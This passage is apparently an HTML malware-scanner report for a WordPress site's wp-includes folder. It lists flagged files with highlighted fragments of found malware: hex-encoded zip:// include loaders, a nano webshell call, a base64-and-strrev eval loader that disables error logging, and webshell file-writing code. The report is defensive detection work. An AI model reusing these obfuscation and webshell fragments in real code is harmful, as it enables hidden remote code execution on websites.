</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_19").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/css/dist/dist/dist/cache.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 366.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:14:52</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:14:52</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_20" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$Z</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">]}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit hex_char <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Hex char is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">\</span><span style="color: #0000BB">x5f</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit silence_inclusion <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>LFI (Local File Inclusion), through a silent inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">@require </span><span style="color: #DD0000">"\x7a\x69\x70\x3a\x2f\x2f\x69\x63\x6f\x5f\x36\x39\x37\x38\x37\x33\x66\x63\x33\x30\x66\x66\x64\x2e\x7a\x69\x70\x23\x63\x5f\x36\x39\x37\x38\x37\x33\x66\x63\x33\x30\x66\x66\x64\x2e\x74\x6d\x70"</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 5aabe84e <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 5aabe84e)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">require </span><span style="color: #DD0000">"zip:</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_20").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/css/dist/dist/dist/index.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 408.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:14:52</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:14:52</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_21" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$Z</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">]}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit hex_char <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Hex char is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">\</span><span style="color: #0000BB">x5f</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_21").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/css/dist/block-library/block-library/cache.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 371.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:04:52</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:04:52</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_22" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$m</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">]}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit hex_char <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Hex char is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">\</span><span style="color: #0000BB">x5f</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit silence_inclusion <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>LFI (Local File Inclusion), through a silent inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">@include_once </span><span style="color: #DD0000">"\x7a\x69\x70\x3a\x2f\x2f\x69\x63\x6f\x5f\x36\x39\x37\x38\x37\x31\x61\x34\x31\x66\x33\x34\x39\x2e\x7a\x69\x70\x23\x63\x5f\x36\x39\x37\x38\x37\x31\x61\x34\x31\x66\x33\x34\x39\x2e\x74\x6d\x70"</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 5aabe84e <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 5aabe84e)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">include_once </span><span style="color: #DD0000">"zip:</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_22").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/css/dist/block-library/block-library/index.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 413.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:04:52</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:04:52</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 2</span><br><table id="file_23" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$m</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">]}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit hex_char <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Hex char is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">\</span><span style="color: #0000BB">x5f</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit nano <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient</p><p><i>[<a href="https://github.com/s0md3v/nano" target="_blank" class="text-primary">https://github.com/s0md3v/nano</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$m</span><span style="color: #007700">[</span><span style="color: #0000BB">1</span><span style="color: #007700">](</span><span style="color: #0000BB">$m</span><span style="color: #007700">[</span><span style="color: #0000BB">2</span><span style="color: #007700">])</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_23").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/e1T2R5BNbLS.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 51.75 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 23:02:14</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 23:02:14</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_24" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'OykpKSkpKSkpKSkpKSkpKSkpKSldODAwMDB4MFtd+KbLW1NMQUJPTEckKDVNaUUyRVZSbkFBZ1VwT1RfKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlfTspKSkpT0REc1Bnb18kKGxaWVZfKGs4ZmRHSktUV18kKGV0YWxmbml6Zyh2ZXJydHMgbnJ1dGVyO2s4ZmRHSktUV18kbGFib2xnO0pyWU42XyRsYWJvbGd7KU9ERHNQZ29fJCg1TWlFMkVWUm5BQWdVcE9UXyBub2l0Y251ZjtdNzAwMHgwW134pstbU0xBQk9MRyQ9azhmZEdKS1RXXyQ7XTYwMHgwW134pstbU0xBQk9MRyQ9SnJZTjZfJH07OUVZYm1fJCBucnV0ZXI7KSkpXTUweDBbXfimy1tTTEF...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #DD0000">'; $MAIqK = '</span><span style="color: #0000BB">strrev</span><span style="color: #DD0000">'; ini_set('</span><span style="color: #0000BB">display_errors</span><span style="color: #DD0000">', 0); ini_set('</span><span style="color: #0000BB">error_log</span><span style="color: #DD0000">', NULL); error_reporting(0); ini_set('</span><span style="color: #0000BB">log_errors</span><span style="color: #DD0000">', 0); eval($MAIqK($eyxBz('</span><span style="color: #0000BB">OykpKSkpKSkpKSkpKSkpKSkpKSldODAwMDB4MFtd</span><span style="color: #007700">+</span><span style="color: #0000BB">KbLW1NMQUJPTEckKDVNaUUyRVZSbkFBZ1VwT1RfKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2Z</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$MAIqK</span><span style="color: #007700">(</span><span style="color: #0000BB">$eyxBz</span><span style="color: #007700">(</span><span style="color: #DD0000">'OykpKSkpKSkpKSkpKSkpKSkpKSldODAwMDB4MFtd+KbLW1NMQUJPTEckKDVNaUUyRVZSbkFBZ1VwT1RfKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlfTspKSkpT0REc1Bnb18kKGxaWVZfKGs4ZmRHSktUV18kKGV0YWxmbml6Zyh2ZXJydHMgbnJ1dGVyO2s4ZmRHSktUV18kbGFib2xnO0pyWU42XyRsYWJvbGd7KU9ERHNQZ29fJCg1TWlFMkVWUm5BQWdVcE9UXyBub2l0Y251ZjtdNzAwMHgwW134pstbU0xBQk9MRyQ9azhmZEdKS1RXXyQ7XTYwMHgwW134pstbU0xBQk9MRyQ9SnJZTjZfJH07OUVZYm1fJCBucnV0ZXI7KSkp...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function strrev eval_strrev <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">LavE</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign de12c454 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: de12c454)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">VJag</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'base64_decode'</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_24").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/RDLhf6PoV2v.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 28.35 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 22:05:15</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 22:05:15</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 44</span><br><table id="file_25" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit download_remote_code2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 652</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">fwrite </span><span style="color: #007700">(</span><span style="color: #0000BB">$fp</span><span style="color: #007700">, </span><span style="color: #0000BB">$_POST </span><span style="color: #007700">[</span><span style="color: #DD0000">'new'</span><span style="color: #007700">])</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit eval_base64 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str2 = '</span><span style="color: #007700">Array(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str3 = '</span><span style="color: #007700">@</span><span style="color: #0000BB">$isbot</span><span style="color: #DD0000">'; $search_str4 = '</span><span style="color: #007700">@require</span><span style="color: #DD0000">'; $search_str5 = '</span><span style="color: #007700">eval(</span><span style="color: #0000BB">gzuncompress</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str6 = '</span><span style="color: #007700">@include </span><span style="color: #DD0000">"\x2'; </span><span style="color: #0000BB">$search_str7</span><span style="color: #DD0000"> = '</span><span style="color: #0000BB">$OO</span><span style="color: #DD0000">'; </span><span style="color: #0000BB">$search_str8</span><span style="color: #DD0000"> = 'cache=00'; </span><span style="color: #0000BB">$search_str9</span><span style="color: #DD0000"> = 'file_get_contents(\"../index.php\")</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit execution <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP</p><p><i>[<a href="https://cwe.mitre.org/data/definitions/77.html" target="_blank" class="text-primary">https://cwe.mitre.org/data/definitions/77.html</a>, <a href=" https://cwe.mitre.org/data/definitions/78.html" target="_blank" class="text-primary"> https://cwe.mitre.org/data/definitions/78.html</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #DD0000">'; $search_str12 = '</span><span style="color: #0000BB">multipart</span><span style="color: #007700">/</span><span style="color: #0000BB">form</span><span style="color: #007700">-</span><span style="color: #0000BB">data</span><span style="color: #DD0000">'; if (!file_exists($finderdata_path)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"no have permission for chmod!"</span><span style="color: #007700">; } else { if (!</span><span style="color: #0000BB">chmod</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">, </span><span style="color: #0000BB">0755</span><span style="color: #007700">)) return </span><span style="color: #DD0000">"no have permission for chmod!"</span><span style="color: #007700">; </span><span style="color: #0000BB">$fp </span><span style="color: #007700">= </span><span style="color: #0000BB">fopen </span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">, </span><span style="color: #DD0000">"w"</span><span style="color: #007700">); if (</span><span style="color: #0000BB">fwrite </span><span style="color: #007700">(</span><span style="color: #0000BB">$fp</span><span style="color: #007700">, </span><span style="color: #0000BB">$_POST </span><span style="color: #007700">[</span><span style="color: #DD0000">'new'</span><span style="color: #007700">])) </span><span style="color: #0000BB">$message </span><span style="color: #007700">= </span><span style="color: #DD0000">' - <font color="green"><b>Edited!</b></font>'</span><span style="color: #007700">; else </span><span style="color: #0000BB">$message </span><span style="color: #007700">= </span><span style="color: #DD0000">' - <font color=</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 105</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"no have permission for chmod!"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 109</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"can not delete!"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 111</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"ok!"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 151</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">unzip_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 164</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">read_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file_name</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 172</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$arr_file</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 181</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clear_folder</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 202</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">only_read</span><span style="color: #007700">(</span><span style="color: #0000BB">$file_name</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 233</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$original_file</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 236</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">findshells</span><span style="color: #007700">(</span><span style="color: #0000BB">$start</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 262</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$arr_filename</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 279</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">';</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 289</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #DD0000">';</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 39</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">|</span><span style="color: #0000BB">void The string of the URL</span><span style="color: #007700">, if </span><span style="color: #0000BB">redirect needed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 41</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DirFilesR</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 441</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_filesize</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 455</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$filesize</span><span style="color: #007700">.</span><span style="color: #DD0000">" gb"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 460</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$filesize</span><span style="color: #007700">.</span><span style="color: #DD0000">" mb"</span><span style="color: #007700">;</span>
</span>
